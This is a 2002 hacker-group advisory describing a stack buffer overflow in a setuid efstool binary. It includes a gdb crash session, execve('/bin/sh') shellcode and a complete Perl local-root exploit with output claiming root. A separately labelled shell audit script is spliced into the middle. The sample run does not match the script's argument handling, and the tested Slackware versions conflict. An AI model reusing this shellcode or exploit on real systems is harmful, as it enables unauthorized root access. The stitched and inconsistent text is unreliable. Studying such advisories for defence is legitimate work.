§+++++++++++++++++++++++++++++++++++++++++++++++§
]|[ [-=- SOLDIERX.COM Presents -=-] ]|[
+++++++++++++++§+++_________________________________________+++§+++++++++++++++
\\//////////////// EFSTOOL LOCAL ROOT EXPLOIT \\\\\\\\\\\\\\\\//
\\\\\\\\\\\\\\\\\______________SLACKWARELINUX_____________/////////////////
\\:::::::::::::::::::::::::::::::: by ::::::::::::::::::::::::::::::::://
\\xxxxxxxxxxxxxxxxxxxxxxxx§-=-][-NTFX-][-=-§xxxxxxxxxxxxxxxxxxxxxxxxx//
\\:::::::::::::::::::::::::::::: of :::::::::::::::::::::::::::::::://
\\ SOLDIERX.COM, LEGION2000 //
\\ September, 2002 //
\\ NOBODY CAN STOP INFORMATION INSEMINATION //
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§
[ Author's E-mail - NTFX@SOLDIERX.COM ]

**********************************************************************
| The author hereby grants permission to reproduce, redistribute,    |
| or include this file(s) in your file section, electronic or print  |
| newsletter, or any other form of transmission that you choose, as  |
| long as it is kept intact and whole, with no omissions, deletions, |
| or changes. (C)2002 SOLDIERX.COM - http://www.soldierx.com         |
**********************************************************************

[L2K Advisory ef0001]    Feb 13th 02

EFSTOOL LOCAL ROOT
Author: ntfx
Legion2000 Security Research (c)
Soldierx Dot Com (c)
Web: http://legion200.security.nu
Web: http://soldierx.com

Note: I have not previously written any advisories, so be patient.

What is Bonobo (contains the efstool package)

Bonobo is a set of language- and system-independent CORBA interfaces for creating reusable components, controls and compound documents. The Bonobo distribution includes a Gtk+ based implementation of the Bonobo interfaces, enabling developers to create reusable components and applications that can be used to form more complex documents.
A condition has been found in efstool, which ships with Red Hat Linux, Slackware Linux and possibly others, through which, given the right environment, root privileges can be gained. This depends on the binary being installed setuid.

If a user passes 3000 "A"s as the argument, the program segfaults, as shown below:

$ /usr/bin/efstool `perl -e 'print "A" x 3000'`
Segmentation fault

Now we open gdb on the binary to see what happened:

$ gdb /usr/bin/efstool
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp            0xbfffe890       0xbfffe890
(gdb)

Here, as you can see, the program crashed at 0x41414141 (our "A"s overwrote the saved return address), and esp gives us the address to use as the return address.

Return : 0xbfffe890

When execution reaches the return address it lands in the NOPs and slides down into the shellcode, which executes a shell in our exploit. The offset has to be played with for the exploit to work reliably, but an offset of around -1000 / -2000 should work. I have done minimal testing on this, so if it doesn't work fully, do not come crying to me.
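The crash above only matters on a setuid install, and the advisory's own fix is to strip that bit. The following POSIX shell script is an added example, not part of the advisory: it audits the assumed Bonobo install paths for a setuid efstool and, given a path, removes the bit and verifies the result.

```shell
#!/bin/sh
# Added example, not part of the advisory: audit efstool for the setuid bit
# and strip it (the advisory's fix, chmod u-s). Install paths are assumptions.

# Return 0 if FILE has the setuid bit set, 1 otherwise.
is_setuid() {
    [ -u "$1" ]
}

# Strip the setuid bit from FILE if present. Returns 0 when the file ends
# up without the bit, 1 if chmod failed, 2 if the file does not exist.
strip_setuid() {
    f="$1"
    if [ ! -e "$f" ]; then
        echo "not found: $f" >&2
        return 2
    fi
    if is_setuid "$f"; then
        echo "setuid bit set on $f, removing it" >&2
        chmod u-s "$f" || return 1
    else
        echo "no setuid bit on $f" >&2
    fi
    if is_setuid "$f"; then return 1; fi
    return 0
}

# Report every efstool copy in the usual install locations (assumed paths)
# and say whether an unprivileged user could still reach it setuid.
audit_efstool() {
    found=0
    for p in /usr/bin/efstool /usr/local/bin/efstool /opt/gnome/bin/efstool; do
        [ -e "$p" ] || continue
        found=1
        if is_setuid "$p"; then
            echo "AT RISK: $p is setuid ($(ls -l "$p"))"
        else
            echo "ok: $p is not setuid"
        fi
    done
    [ "$found" -eq 1 ] || echo "efstool not installed in the checked paths"
}

# Usage: sh audit_efstool.sh                    (report only)
#        sh audit_efstool.sh /path/to/efstool   (strip the bit from that file)
if [ -n "${1:-}" ]; then
    strip_setuid "$1"
else
    audit_efstool
fi
```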
It has been tested on Slackware 7.1.

Solution: remove the setuid permission from the program:

# chmod u-s efstool

Added: Do not confuse this with the other efstool release. Our version was semi-released back on Feb 13th when the original discovery took place; I personally do not like using SecurityFocus for releases and have never previously bothered with it.

- ntfx 10.09

Included is the example exploit.

--------------------------cut kitkat.pl---------------------------------
#!/usr/bin/perl
# Efstool local root exploit (Slackware 8.1)
# Author: ntfx Feb 13th 2002
# Legion2000 Security Research (c)
# Soldierx Dot Com
# WEB: HTTP://legion2000.security.nu
# WEB: HTTP://soldierx.com
# GREET: Legion2000SR, Soldierx.com, Kat
############################################
# Solution: chmod u-s efstool
############################################

# Usage: perl kitkat.pl <offset> kat
# The first argument is the offset added to the return address; the second
# must be the literal "kat" for the NOP sled and shellcode to be built.
if (!defined $ARGV[0]) { &usage; exit; }

sub usage() {
    print "USAGE: perl $0 <offset> kat\n";
    print "efstool local root by ntfx\n";
    print "Legion2000SR http://legion2000.security.nu\n";
    print "Soldierx http://soldierx.com\n";
    exit(0);
}

$ret    = 0xbfffe890;   # esp at the crash (see the gdb session); a number, not a string
$offset = $ARGV[0];
$nop    = "\x90";

# execve("/bin/sh") shellcode
$ev1lc0de = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
            "\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
            "\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
            "\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
            "/bin/sh";

$buffer = "";
if (defined $ARGV[1] && $ARGV[1] eq "kat") {
    $len = 3000;
    # NOP sled, then the shellcode
    for ($i = 0; $i < ($len - length($ev1lc0de)); $i++) {
        $buffer .= $nop;
    }
    $buffer .= $ev1lc0de;
}
# Return address (little-endian), repeated twice
$buffer .= pack('l', ($ret + $offset));
$buffer .= pack('l', ($ret + $offset));

# You will now be privileged..
# List form so the buffer is passed as one argv entry, not through /bin/sh.
exec("/usr/bin/efstool", $buffer);
# Only reached if exec() fails, since exec replaces this process.
sleep 2;
system("id; uname -a");
# This has been a SoldierX/Legion2000 Production.
--------------------------cut kitkat.pl---------------------------------

$ perl kitkat.pl kat
uid=0(root) gid=100(users) groups=100(users)
Linux efstool-exp 2.2.21 #1 Thu Jun 13 03:57:27 BST 2002 i586 unknown
#

As you can see, root privileges have been gained; the id and uname output shows the root uid and the system details.

ntfx
_____________________________________________________________________
§=------------------------------]-§-[------------------------------=§
\\ THIS FILE WAS A SOLDIERX PRODUCTION //
\\ http://www.soldierx.com //
\\ NOBODY CAN STOP INFORMATION INSEMINATION //
§=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++=§